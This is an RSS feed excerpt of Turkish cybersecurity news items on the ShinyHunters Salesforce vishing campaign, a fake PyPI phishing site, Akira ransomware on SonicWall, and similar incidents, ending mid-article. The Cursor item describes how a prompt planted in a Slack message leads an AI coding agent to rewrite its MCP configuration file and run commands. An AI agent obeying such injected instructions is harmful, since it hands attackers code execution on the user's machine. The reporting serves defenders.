<content:encoded><![CDATA[<h2>ShinyHunters Siber Suç Grubu, Önde Gelen Şirketlere Salesforce CRM Saldırıları Düzenliyor</h2>
<p>Siber güvenlik kaynaklarına göre, <strong>ShinyHunters</strong> olarak bilinen siber suç grubu, <strong>Qantas, Allianz Life, LVMH</strong> ve <strong>Adidas</strong> gibi önde gelen firmaları hedef alan geniş kapsamlı veri hırsızlığı saldırılarının arkasında yer alıyor. Söz konusu saldırılar, şirketlerin kullandığı Salesforce CRM platformlarına yönelik sosyal mühendislik yöntemleriyle gerçekleştirildi.</p>
<p>Google’ın Tehdit İstihbarat Grubu (GTIG), Haziran 2025'te bu tür saldırıların arttığını ve saldırganların <em>UNC6040</em> olarak izlendiğini bildirmişti. Bu kapsamda, saldırganlar BT destek personeli gibi davranarak kurbanları telefonla aradı ve onları Salesforce'un bağlı uygulama kurulumu sayfasına yönlendirdi. Kullanıcılardan sahte "bağlantı kodları" girilmesi istendi. Böylece, kötü amaçlı olarak kurgulanmış Data Loader uygulaması kurbanın hesabına bağlanabildi.</p>
<p>Bazı saldırılarda, bu uygulama “My Ticket Portal” adıyla yeniden adlandırılarak daha inandırıcı hale getirildi. Kimlik avı sürecinde ayrıca sahte Okta giriş sayfaları da kullanılarak kullanıcıların kimlik bilgileri ve çok faktörlü kimlik doğrulama (MFA) token'ları da ele geçirildi.</p>
<h3>Hedef Olan Şirketler</h3>
<ul>
<li>LVMH bünyesindeki Louis Vuitton, Dior ve Tiffany & Co., müşteri veritabanlarına yetkisiz erişim sağlandığını doğruladı.</li>
<li>Allianz Life, 16 Temmuz 2025’te üçüncü taraf bir bulut tabanlı CRM sistemi üzerinden erişim sağlandığını açıkladı.</li>
<li>Qantas, olayın Salesforce ile ilgili olduğunu doğrulamazken, yerel medya verilerin Salesforce sistemi üzerinden çalındığını bildirdi.</li>
<li>Adidas da benzer bir CRM saldırısından etkilendiğini duyurdu.</li>
</ul>
<p>Adli belgeler, saldırıların özellikle Salesforce’un "Accounts" ve "Contacts" tablolarına odaklandığını ortaya koyuyor. Tüm saldırılar aynı kampanyaya işaret ederken, şirketlere gönderilen özel e-postalarda kendilerini "ShinyHunters" olarak tanıtan tehdit aktörlerinin şirketleri özel olarak şantaj yoluyla hedef aldığı belirtildi.</p>
<h3>Grup Yapısı ve Saldırı Yöntemleri</h3>
<p>ShinyHunters grubu, daha önce Snowflake veri sızıntısı, AT&T, Oracle Cloud, PowerSchool gibi büyük ölçekli olaylarla gündeme gelmişti. Grup, genellikle şirket ağlarına tam erişim sağlamak yerine veri çalımı ve özel şantaj yöntemlerine odaklanıyor.</p>
<p>Bazı güvenlik araştırmacıları, ShinyHunters’ın zaman zaman <em>Scattered Spider</em> olarak bilinen ve daha agresif yöntemler kullanan başka bir grupla örtüşen üyelik yapısına sahip olduğunu düşünüyor. Her iki grubun da <em>Lapsus$</em> adlı eski hacker kolektifiyle bağlantılı olabileceği iddia ediliyor.</p>
<p>Ayrıca, ShinyHunters’ın bazı durumlarda doğrudan saldırıyı gerçekleştirmeyip, üçüncü tarafların çaldığı verileri komisyon karşılığında pazarlayan bir “extortion-as-a-service” (şantaj hizmeti) grubu olarak faaliyet gösterdiği de öne sürülüyor.</p>
<h3>Salesforce: Platform Değil, Kullanıcılar Hedef Alınıyor</h3>
<p>Salesforce, yapılan açıklamada sistemlerinde herhangi bir zafiyet olmadığını ve saldırıların tamamen kullanıcılara yönelik sosyal mühendislik yöntemleriyle gerçekleştiğini belirtti.</p>
<p>Şirket, kullanıcıların aşağıdaki güvenlik önlemlerini uygulamasını öneriyor:</p>
<ul>
<li>Güvenilen IP aralıklarını zorunlu hale getirme</li>
<li>En az yetki ilkesine uygun yetkilendirme</li>
<li>Çok faktörlü kimlik doğrulama (MFA) kullanımı</li>
<li>Bağlı uygulamalara erişimi sınırlandırma</li>
<li>Salesforce Shield ile gelişmiş izleme ve olay politikaları kullanımı</li>
<li>Güvenlik olayları için belirli bir güvenlik iletişim kişisi tanımlama</li>
</ul>
<p></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Python geliştiricileri sahte PyPI sitesi üzerinden kimlik avı saldırılarıyla hedef alınıyor</title>
<link>https://www.ajansexpres.com.tr/python-gelistiricileri-sahte-pypi-sitesi-uzerinden-kimlik-avi-saldirilariyla-hedef-aliniyor</link>
<guid>https://www.ajansexpres.com.tr/python-gelistiricileri-sahte-pypi-sitesi-uzerinden-kimlik-avi-saldirilariyla-hedef-aliniyor</guid>
<description><![CDATA[ Python Software Foundation, PyPI kullanıcılarını sahte bir site üzerinden yapılan kimlik avı saldırılarına karşı uyardı. &quot;pypj.org&quot; alan adına sahip sahte sitede kullanıcı adı ve parola toplayan saldırganların amacı, geliştiricilerin yüklediği paketleri kötü amaçlı yazılımlarla değiştirmek ya da yeni zararlı paketler yüklemek. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948361d94f5.webp" length="17164" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:45 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>sahte PyPI sitesine nasıl yönlendiriliyor, geliştirici hesapları nasıl ele geçiriliyor, zararlı Python paketleri nasıl yükleniyor, PyPI kullanıcıları ne yapmalı</media:keywords>
<content:encoded><![CDATA[<h2>PyPI Topluluğu Kimlik Avı Saldırısına Karşı Uyarıldı: Sahte "Email Verification" E-postalarına Dikkat</h2>
<p>Python topluluğunun resmi paket deposu olan <strong>PyPI (Python Package Index)</strong>, bu hafta kullanıcılarını sahte bir web sitesi üzerinden yürütülen kimlik avı saldırısına karşı uyardı. Saldırganlar, PyPI geliştiricilerine <em>"[PyPI] Email verification"</em> başlıklı ve <strong>noreply@pypj.org</strong> adresinden gönderilen e-postalarla ulaşıyor.</p>
<p>PyPI yöneticisi Mike Fiedler tarafından yapılan açıklamada, “Bu durum PyPI platformunun güvenliğini ihlal eden bir saldırı değil, kullanıcı güvenini istismar eden bir kimlik avı girişimidir. Kullanıcılardan e-postalarını doğrulamaları isteniyor ve sahte bir siteye yönlendiriliyorlar.” ifadeleri kullanıldı.</p>
<p>Söz konusu sahte site, resmi PyPI platformuna görsel olarak benzeyecek şekilde tasarlanmış ve kullanıcıları oturum açmaya yönlendiriyor. Ancak bu giriş bilgilerinin gerçek PyPI’ye iletilmesi yerine saldırganlar tarafından toplandığı belirtiliyor.</p>
<h3>Hedef: Hesap Ele Geçirme ve Zararlı Paket Yükleme</h3>
<p>Saldırganların amacı, geliştiricilere ait PyPI hesaplarını ele geçirerek daha önce yayımlanmış Python paketlerine kötü amaçlı kod enjekte etmek veya yeni zararlı paketler yüklemek. Bu tür saldırılar, açık kaynak yazılım ekosisteminde geniş çaplı güvenlik tehditlerine yol açabiliyor.</p>
<h3>PyPI Platformu Önlem Aldı</h3>
<p>PyPI yöneticileri, sitenin ana sayfasına bir uyarı bandı ekleyerek kullanıcıları aktif olarak bilgilendirmeye başladı. Ayrıca, alan adı sağlayıcıları ve CDN firmalarına marka ihlali ve kötüye kullanım bildirimleri gönderildiği belirtildi.</p>
<p>Kullanıcılardan şu önlemleri almaları istendi:</p>
<ul>
<li><strong>noreply@pypj.org</strong> adresinden gelen e-postalara tıklamadan silinmesi,</li>
<li>Daha önce bu sahte sitede kullanıcı bilgisi girildiyse, şifrelerinin derhal değiştirilmesi,</li>
<li>Hesaplarının Security History bölümü üzerinden şüpheli etkinliklerin kontrol edilmesi.</li>
</ul>
<h3>Daha Önce de Saldırılar Yaşanmıştı</h3>
<p>Python Software Foundation, geçtiğimiz yıl yüzlerce zararlı paketin yüklenmesiyle sonuçlanan bir kampanya nedeniyle geçici olarak yeni kullanıcı kaydı ve proje oluşturma işlemlerini durdurmak zorunda kalmıştı. Ayrıca Şubat 2025’te başlatılan Project Archival sistemiyle, artık güncelleme almayacak projelerin arşivlenmesi kolaylaştırılmıştı.</p>
<p>Uzmanlar, açık kaynak topluluklarında yer alan geliştiricilerin e-posta adreslerini içeren meta verilerinin saldırganlar için değerli bir kaynak olduğunu ve bu verilerin kimlik avı kampanyalarında kullanılabileceğini hatırlatıyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>SonicWall güvenlik duvarları Akira fidye yazılımı saldırılarının hedefinde: Yeni bir güvenlik açığı mı kullanılıyor</title>
<link>https://www.ajansexpres.com.tr/sonicwall-guvenlik-duvarlari-akira-fidye-yazilimi-saldirilarinin-hedefinde-yeni-bir-guvenlik-acigi-mi-kullaniliyor</link>
<guid>https://www.ajansexpres.com.tr/sonicwall-guvenlik-duvarlari-akira-fidye-yazilimi-saldirilarinin-hedefinde-yeni-bir-guvenlik-acigi-mi-kullaniliyor</guid>
<description><![CDATA[ Siber güvenlik firması Arctic Wolf, Temmuz ortasından bu yana SonicWall SSL VPN cihazlarına yönelik Akira fidye yazılımı saldırılarında artış yaşandığını bildirdi. Henüz doğrulanmamış olsa da, saldırıların bilinmeyen bir sıfırıncı gün açığı üzerinden gerçekleştiği düşünülüyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948355353a7.webp" length="35590" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:33 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Akira grubu hangi yöntemle SonicWall cihazlarına sızıyor, sıfırıncı gün açığı kullanılıyor mu, yöneticiler hangi acil önlemleri almalı, SMA 100 cihazlarında hangi riskler öne çıkıyor</media:keywords>
<content:encoded><![CDATA[<h2>Arctic Wolf Uyardı: SonicWall Cihazları Akira Fidye Yazılımı Saldırılarıyla Hedefte</h2>
<p>Siber güvenlik şirketi <strong>Arctic Wolf</strong>'un açıklamasına göre, Temmuz ayının ikinci yarısından itibaren SonicWall güvenlik duvarı cihazları <em>Akira</em> fidye yazılımı saldırılarında hedef alınmaya başladı. Saldırganların, henüz doğrulanmamış olmakla birlikte, daha önce bilinmeyen bir güvenlik açığını kullanıyor olabileceği değerlendiriliyor.</p>
<p><strong>Akira fidye yazılımı</strong> Mart 2023'te ortaya çıktı ve kısa sürede dünya genelinde çok sayıda sektörü hedef aldı. Bugüne kadar 300’den fazla kurumu karanlık ağ sızıntı portalına ekleyen grup; Nissan, Hitachi ve Stanford Üniversitesi gibi yüksek profilli kuruluşlara yönelik saldırılarla dikkat çekti. FBI verilerine göre, Akira grubu Nisan 2024 itibarıyla 250'den fazla kurbanından toplamda 42 milyon doların üzerinde fidye topladı.</p>
<p>Arctic Wolf Labs araştırmacıları, saldırıların çoğunun SonicWall SSL VPN bağlantıları üzerinden yetkisiz erişim yoluyla gerçekleştiğini, ilk sızmanın 15 Temmuz'da gözlendiğini açıkladı. Henüz erişim yöntemi kesinleşmemekle birlikte, bir sıfırıncı gün açığı olasılığı güçlü şekilde değerlendiriliyor. Ancak brute force, sözlük saldırıları veya kimlik bilgisi dolandırıcılığı gibi yöntemlerin de tamamen dışlanmadığı belirtildi.</p>
<h3>Uzun Süreli ve Hedefli Kampanya</h3>
<p>Saldırganlar, VPN üzerinden sağlanan ağ erişimini çok kısa sürede veri şifreleme aşamasına taşıyor. Bu durum, Ekim 2024’ten bu yana tespit edilen benzer saldırı örüntüleriyle örtüşüyor ve SonicWall cihazlarına yönelik süregelen ve organize bir kampanyaya işaret ediyor.</p>
<p>VPN bağlantılarında genellikle geniş bant internet servis sağlayıcıları kullanılırken, bu saldırılarda sanal özel sunucu (VPS) tabanlı VPN kimlik doğrulama hizmetlerinin tercih edildiği tespit edildi. Bu detay, saldırıların sistematik biçimde yürütüldüğünü ortaya koyuyor.</p>
<h3>Arctic Wolf’un Tavsiyeleri ve Güvenlik Önlemleri</h3>
<p>Arctic Wolf, SonicWall cihazlarında potansiyel bir sıfırıncı gün açığının aktif olarak istismar ediliyor olabileceği ihtimaline karşı, yöneticilere SSL VPN hizmetlerini geçici olarak devre dışı bırakmalarını tavsiye etti. Ayrıca detaylı günlük kaydı alma, uç nokta izleme ve VPS tabanlı VPN oturumlarının engellenmesi gibi ek güvenlik önlemlerinin devreye alınması gerektiği bildirildi.</p>
<h3>SMA 100 Cihazları İçin Güncelleme Uyarısı</h3>
<p>Saldırılara ilişkin Arctic Wolf raporu, SonicWall’un müşterilerini SMA 100 cihazlarındaki kritik bir güvenlik açığı (<strong>CVE-2025-40599</strong>) hakkında uyarmasından bir hafta sonra yayımlandı. SonicWall, söz konusu açığın kötüye kullanılabilmesi için yönetici ayrıcalığı gerektiğini ve şu anda aktif bir sömürü izine rastlanmadığını belirtti. Ancak yine de tüm kullanıcıların sistemlerini güncellemeleri istendi.</p>
<p>Google Threat Intelligence Group (GTIG) tarafından yayımlanan bir başka raporda, saldırganların yetkisiz erişim elde ettikten sonra <strong>OVERSTEP</strong> adlı yeni bir rootkit zararlı yazılım yüklediği belirtildi.</p>
<p>SonicWall, sanal veya fiziksel SMA 100 cihazı kullanan tüm müşterilere, GTIG tarafından paylaşılan bulgu göstergeleri (IoC) doğrultusunda sistem günlüklerini incelemeleri ve şüpheli faaliyet durumunda destek ekipleriyle irtibata geçmeleri çağrısında bulundu.</p>
<p>Not: SonicWall tarafından konuya ilişkin henüz resmi bir açıklama yapılmamıştır.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Pi&#45;hole, bağışçılara ait verilerin ifşa olduğu veri ihlalini doğruladı: WordPress eklentisi kaynaklı açık</title>
<link>https://www.ajansexpres.com.tr/pi-hole-bagiscilara-ait-verilerin-ifsa-oldugu-veri-ihlalini-dogruladi-wordpress-eklentisi-kaynakli-acik</link>
<guid>https://www.ajansexpres.com.tr/pi-hole-bagiscilara-ait-verilerin-ifsa-oldugu-veri-ihlalini-dogruladi-wordpress-eklentisi-kaynakli-acik</guid>
<description><![CDATA[ Ağ düzeyinde reklam engelleme aracı Pi-hole, web sitesindeki bağış formunda kullanılan GiveWP WordPress eklentisindeki bir güvenlik açığı nedeniyle yaklaşık 30 bin bağışçının isim ve e-posta bilgilerinin sızdırıldığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894835096946.webp" length="36168" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:28 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Pi-hole veri ihlali nasıl gerçekleşti, hangi bilgiler sızdırıldı, GiveWP güvenlik açığı ne kadar sürede kapatıldı, Pi-hole yazılımı olaydan etkilendi mi</media:keywords>
<content:encoded><![CDATA[<h2>Pi-hole: GiveWP Bağış Eklentisi Güvenlik Açığıyla 30 Bin Kullanıcı Verisi Sızdırıldı</h2>
<p>Popüler reklam engelleme çözümü <strong>Pi-hole</strong>, WordPress bağış eklentisi <strong>GiveWP</strong>’de tespit edilen kritik bir güvenlik açığı nedeniyle kullanıcı verilerinin sızdırıldığını duyurdu.</p>
<p>Kuruluş, <strong>28 Temmuz Pazartesi</strong> günü bağışçılardan gelen şüpheli e-posta bildirimleri üzerine durumu fark etti. Yapılan teknik inceleme, GiveWP eklentisinin bir açığından dolayı bağış yapan kullanıcıların isim ve e-posta adreslerinin, herhangi bir kimlik doğrulama olmaksızın sayfanın kaynak kodunu görüntüleyen herkes tarafından erişilebilir olduğunu ortaya koydu.</p>
<p>Veri ihlali yalnızca bağış formu üzerinden destek veren kullanıcıları etkilerken, Pi-hole’un kendi yazılımı bu olaydan etkilenmedi.</p>
<h3>Yaklaşık 30 Bin Bağışçı Etkilendi</h3>
<p>1 Ağustos Cuma yayımlanan analizde, veri ihlali bildirim servisi <em>Have I Been Pwned</em> yaklaşık 30 bin bağışçının etkilendiğini belirtti. Sızan kayıtların %73’ü, daha önce başka ihlallerde de ifşa olmuş kullanıcı bilgilerini içeriyor.</p>
<p>Pi-hole, finansal bilgilerin <strong>Stripe</strong> ve <strong>PayPal</strong> tarafından işlendiğini, bu nedenle kredi kartı veya ödeme detaylarının sızdırılmadığını vurguladı.</p>
<p>Bağış formunda kullanıcıların geçerli isim veya e-posta girmesi zorunlu olmasa da, tüm bağışçı bilgilerine internet üzerinden erişilebilmesinden dolayı Pi-hole özür diledi.</p>
<h3>Gecikmeli Bilgilendirme ve Eleştiriler</h3>
<p>GiveWP geliştirici ekibi, açığı GitHub’da rapor edilmesinden birkaç saat sonra gidererek <strong>4.6.1</strong> sürümünü yayımladı. Ancak Pi-hole, geliştiricinin kullanıcı bilgilendirmede geciktiğini ve olayın ciddiyetini yeterince önemsemediğini savundu.</p>
<p>Pi-hole açıklamasında, “Kullandığımız yazılımların sorumluluğu bize aittir. Yaygın kullanılan bir eklentiye güven duyduk ve bu güven boşa çıktı. Etkilenen tüm bağışçılardan özür dileriz.” ifadesi yer aldı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Cursor IDE&amp;apos;de keşfedilen &amp;quot;CurXecute&amp;quot; açığı, geliştirici yetkileriyle uzaktan kod çalıştırılmasına yol açabiliyor</title>
<link>https://www.ajansexpres.com.tr/cursor-idede-kesfedilen-curxecute-acigi-gelistirici-yetkileriyle-uzaktan-kod-calistirilmasina-yol-acabiliyor</link>
<guid>https://www.ajansexpres.com.tr/cursor-idede-kesfedilen-curxecute-acigi-gelistirici-yetkileriyle-uzaktan-kod-calistirilmasina-yol-acabiliyor</guid>
<description><![CDATA[ Yapay zekâ destekli yazılım geliştirme ortamı Cursor, harici kaynaklardan gelen zararlı girdilerin kod yürütmesine neden olabileceği bir güvenlik açığı (CVE-2025-54135) ile karşı karşıya. Araştırmacılar, bu zafiyetin fidye yazılımı ve veri sızıntılarına zemin hazırlayabileceğini belirtiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894834c6358f.webp" length="29482" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:24 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CurXecute açığı nasıl çalışıyor, Cursor kullanıcıları hangi sürüme geçmeli, mcp.json dosyası neden kritik, yapay zekâ ajanları dış girdilerle nasıl yönlendiriliyor</media:keywords>
<content:encoded><![CDATA[<h2>Yapay Zekâ Destekli Cursor Kod Editöründe Kritik Güvenlik Açığı: CurXecute (CVE-2025-54135)</h2>
<p>Yapay zekâ destekli kod editörü <strong>Cursor</strong>'da tespit edilen yeni bir güvenlik açığı, sistemde geliştirici ayrıcalıklarıyla <em>uzaktan komut çalıştırılmasına</em> olanak tanıyor. Araştırma şirketi <strong>Aim Security</strong> tarafından "CurXecute" adı verilen bu zafiyet, <strong>CVE-2025-54135</strong> olarak kayda geçti.</p>
<p>Cursor IDE, <em>Model Context Protocol (MCP)</em> adlı açık standart sayesinde yapay zekâ ajanlarının harici kaynaklarla bağlantı kurup işlevsel olmasını sağlıyor. Ancak MCP yapısı, ajanın kontrol akışının kötü niyetli girdilerle manipüle edilmesine zemin hazırlıyor.</p>
<h3>Zararlı Prompt Dosyası Yazdırabiliyor</h3>
<p>CurXecute açığından faydalanan saldırganlar, ajana dış kaynaktan gönderilen zararlı komut dizileriyle <code>~/.cursor/mcp.json</code> dosyasını yeniden yazabiliyor. Kullanıcının bilgisi olmadan bu dosya diske kaydediliyor ve böylece uzaktan komut çalıştırma mümkün hale geliyor.</p>
<p>Aim Security’ye göre dosya değişiklikleri kullanıcı tarafından reddedilse bile etkisi sürüyor; bu da kullanıcı etkileşimi olmadan saldırıların başarıyla yürütülebilmesine sebep oluyor.</p>
<p>Örneğin, MCP destekli Slack sunucularına zararlı bir prompt yerleştirilip, geliştiricinin bu mesajları özetlemesi için ajan kullanılması halinde kötü amaçlı betikler çalıştırılabiliyor.</p>
<blockquote>“Zehirli tek bir belge, yerel yapay zekâ ajanını sistem kabuğuna dönüştürebilir.” — Aim Security</blockquote>
<h3>Yama ve Tavsiyeler</h3>
<p>CurXecute açığı 7 Temmuz 2025’te Cursor geliştirici ekibine bildirildi, ertesi gün yazılım ana dalına yama eklendi. 29 Temmuz’da yayımlanan <strong>Cursor 1.3</strong> sürümü bu açığı kapatan güncellemeleri içeriyor.</p>
<p>Cursor ekibi, <strong>CVE-2025-54135</strong> için yayınladığı güvenlik danışma metninde, kullanıcıların mümkün olan en kısa sürede güncellemeye geçmelerini ve eski sürümleri kullanmamalarını öneriyor. Açık, 8.6 skorla “orta seviye kritik” olarak derecelendirildi.</p>
<p>Araştırmacılar, bu açığın fidye yazılım saldırıları, veri sızıntıları, yapay zekâ bazlı yanlış yönlendirmeler (hallusinasyonlar) ve proje bütünlüğünü tehdit eden sızıntı tabanlı saldırılara yol açabileceği konusunda uyarıda bulunuyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Pwn2Own 2025, WhatsApp&amp;apos;taki sıfır tıklama açığına 1 milyon dolarlık ödül koydu</title>
<link>https://www.ajansexpres.com.tr/pwn2own-2025-whatsapptaki-sifir-tiklama-acigina-1-milyon-dolarlik-oedul-koydu</link>
<guid>https://www.ajansexpres.com.tr/pwn2own-2025-whatsapptaki-sifir-tiklama-acigina-1-milyon-dolarlik-oedul-koydu</guid>
<description><![CDATA[ Dünyanın en büyük siber güvenlik yarışmalarından Pwn2Own, Ekim ayında İrlanda’da düzenlenecek 2025 etkinliğinde, kullanıcı etkileşimi gerektirmeyen WhatsApp açıklarını ortaya çıkaran araştırmacılara 1 milyon dolar ödül verecek. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483482bdc6.webp" length="42710" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:20 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>WhatsApp sıfır tıklama açığı nedir, Pwn2Own 2025 ödülleri hangi kategorileri kapsıyor, mobil cihazlara USB ile saldırı nasıl mümkün oluyor, Meta neden bu yılki yarışmayı destekliyor</media:keywords>
<content:encoded><![CDATA[<h2>Pwn2Own 2025 İrlanda: WhatsApp Zero-Click Açığı İçin 1 Milyon Dolar Ödül</h2>
<p>Siber güvenlik yarışması <strong>Pwn2Own</strong>, 2025 İrlanda ayağında <em>kullanıcı etkileşimi olmadan çalışan (zero-click)</em> bir WhatsApp güvenlik açığı keşfeden araştırmacıya <strong>1 milyon dolar</strong> ödül verileceğini duyurdu.</p>
<p>Etkinliği organize eden <strong>Zero Day Initiative (ZDI)</strong>, WhatsApp’ın dünya genelinde 3 milyardan fazla kullanıcıya sahip olduğunu ve böyle bir açığın kritik öneme sahip olduğunu belirtti. Bu açık sayesinde hedef cihaza kullanıcı herhangi bir işlem yapmadan zararlı kod yüklenebiliyor.</p>
<h3>Etkinlik Detayları ve Kategoriler</h3>
<p><strong>Pwn2Own Ireland 2025</strong>, 21-24 Ekim tarihleri arasında İrlanda’nın Cork kentinde düzenlenecek. Yarışmanın sponsorları arasında Meta, Synology ve QNAP bulunuyor. Meta, WhatsApp açıklarına özel ilgi göstererek bu kategori için rekor ödül seviyesini belirledi.</p>
<p>Yarışmada yalnızca WhatsApp değil, akıllı telefonlar, mesajlaşma uygulamaları, ev ağı ekipmanları, giyilebilir cihazlar, akıllı gözlükler ve yazıcılar gibi sekiz farklı kategoriye yönelik saldırı senaryoları değerlendirilecek.</p>
<p>Bu yıl mobil cihaz kategorisi için saldırı yüzeyi genişletildi. Yarışmacılar USB bağlantısı yoluyla fiziksel olarak kilitli telefonlara da sızmayı deneyebilecek. Wi-Fi, Bluetooth ve NFC gibi kablosuz protokoller saldırı yöntemleri arasında yer almaya devam ediyor.</p>
<h3>Başvuru ve Ödül Süreci</h3>
<p>Kayıtlar <strong>16 Ekim 2025, saat 17:00</strong>'ye kadar alınacak ve yarışma sıralaması kura ile belirlenecek. ZDI’nın amacı, güvenlik açıklarının kötü niyetlilerden önce tespit edilerek üretici firmalarla iş birliği içinde kapatılmasıdır.</p>
<p>Tespit edilen açıklar firmalara bildirilecek, 90 gün içinde yamalanmazsa kamuoyuna açıklanabilecek.</p>
<h3>Geçmişten Notlar</h3>
<p>2024 Pwn2Own Ireland etkinliğinde 70'ten fazla sıfır gün açığı keşfedildi ve toplamda 1 milyon doların üzerinde ödül dağıtıldı. Örneğin Viettel Cyber Security ekibi, QNAP NAS, Sonos hoparlör ve Lexmark yazıcı açıkları ile 205 bin dolar kazandı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>SafePay fidye yazılımı grubu, Ingram Micro&amp;apos;ya ait 3,5 TB veriyi sızdırmakla tehdit ediyor</title>
<link>https://www.ajansexpres.com.tr/safepay-fidye-yazilimi-grubu-ingram-microya-ait-35-tb-veriyi-sizdirmakla-tehdit-ediyor</link>
<guid>https://www.ajansexpres.com.tr/safepay-fidye-yazilimi-grubu-ingram-microya-ait-35-tb-veriyi-sizdirmakla-tehdit-ediyor</guid>
<description><![CDATA[ Dünyanın en büyük BT dağıtım şirketlerinden Ingram Micro, Temmuz ayı başında gerçekleşen saldırının ardından sistemlerini kademeli olarak geri yüklese de, SafePay fidye yazılımı grubu şimdi 3,5 terabaytlık veri sızıntısıyla tehdit ediyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483442b503.webp" length="49264" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:16 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Ingram Micro saldırısında hangi veriler çalındı, SafePay grubu kimleri hedef alıyor, sistem kesintileri nasıl giderildi, şirket saldırganların kimliğini neden doğrulamadı</media:keywords>
<content:encoded><![CDATA[<h2>SafePay Fidye Yazılımı Grubu, Ingram Micro’nun 3,5 TB Veri Sızıntısı Tehdidinde Bulundu</h2>
<p>SafePay adlı fidye yazılımı grubu, küresel bilgi teknolojileri distribütörü <strong>Ingram Micro</strong>’nun sistemlerinden ele geçirildiği iddia edilen <strong>3,5 terabaytlık</strong> veriyi sızdırma tehdidinde bulundu. Grup, şirket verilerini karanlık ağdaki sızıntı portalında yayımlamayı planladığını açıkladı.</p>
<p>Ingram Micro; donanım, yazılım, bulut hizmetleri, lojistik ve eğitim alanlarında dünya çapında bayilere ve yönetilen hizmet sağlayıcılarına çözümler sunan çok uluslu bir teknoloji şirketidir.</p>
<h3>Olayın Gelişimi</h3>
<p>İlk bildirim 5 Temmuz’da yapılmış, SafePay grubunun saldırının arkasında olduğu bilgisi paylaşılmıştı. Ancak saldırı grubu, taahhüdünü resmi olarak bu hafta başında doğruladı.</p>
<p>SafePay, kurban sistemleri şifrelemeden önce hassas verileri ele geçirip ödeme alınmadığı takdirde bunları yayımlamakla bilinen bir fidye grubu. 2024 Eylül’den beri 260’tan fazla kurbanı karanlık ağda listeliyor.</p>
<h3>Etkiler ve Şirketin Yanıtı</h3>
<p>Saldırı, Ingram Micro’nun küresel operasyonlarında kesintilere neden oldu. İnternet sitesi ve sipariş sistemleri kapandı, çalışanlara evden çalışma talimatı verildi.</p>
<p>Şirket, VPN erişimini yeniden sağlamak için çalıştı, parola ve çok faktörlü kimlik doğrulama (MFA) sistemlerini kapsamlı şekilde sıfırladı. Dört gün içinde tüm bölgelerdeki faaliyetler yeniden başlatıldı.</p>
<p>Ancak Ingram Micro, SafePay’in saldırıdan sorumlu olup olmadığı veya verilerin gerçekten sızdırılıp sızdırılmadığı konusunda henüz resmi açıklama yapmadı.</p>
<p>Basın kuruluşları, şirketten konuyla ilgili bilgi almakta zorlanıyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>WordPress Alone temasında kritik dosya yükleme açığı: Binlerce site uzaktan ele geçirildi</title>
<link>https://www.ajansexpres.com.tr/wordpress-alone-temasinda-kritik-dosya-yukleme-acigi-binlerce-site-uzaktan-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/wordpress-alone-temasinda-kritik-dosya-yukleme-acigi-binlerce-site-uzaktan-ele-gecirildi</guid>
<description><![CDATA[ WordPress güvenlik firması Wordfence, Alone teması üzerinden gerçekleştirilen kimlik doğrulaması gerektirmeyen dosya yükleme saldırılarının tüm dünyada 120 binden fazla deneme ile yaygınlaştığını duyurdu. Uygulanan saldırılar, tam site kontrolü sağlayan arka kapılar içeriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894833fdc5f1.webp" length="35290" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:43:11 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>WordPress Alone teması hangi sürümlerde tehlikeli, saldırganlar hangi yöntemle arka kapı kuruyor, hangi IP adreslerinden saldırı yapılıyor, kullanıcılar hangi belirtilere dikkat etmeli</media:keywords>
<content:encoded><![CDATA[<h2>WordPress Alone Temasında Kritik Güvenlik Açığı Aktif Olarak İstismar Ediliyor</h2>
<p>Siber saldırganlar, WordPress’in yaygın kullanılan <strong>Alone</strong> temasında tespit edilen <strong>CVE-2025-5394</strong> kodlu kritik açığı aktif şekilde istismar ediyor. Bu zafiyet, uzaktan kimlik doğrulaması olmadan rastgele dosya yüklenmesine ve siteye tam erişim sağlanmasına yol açıyor.</p>
<h3>Saldırı Yöntemi ve Etkileri</h3>
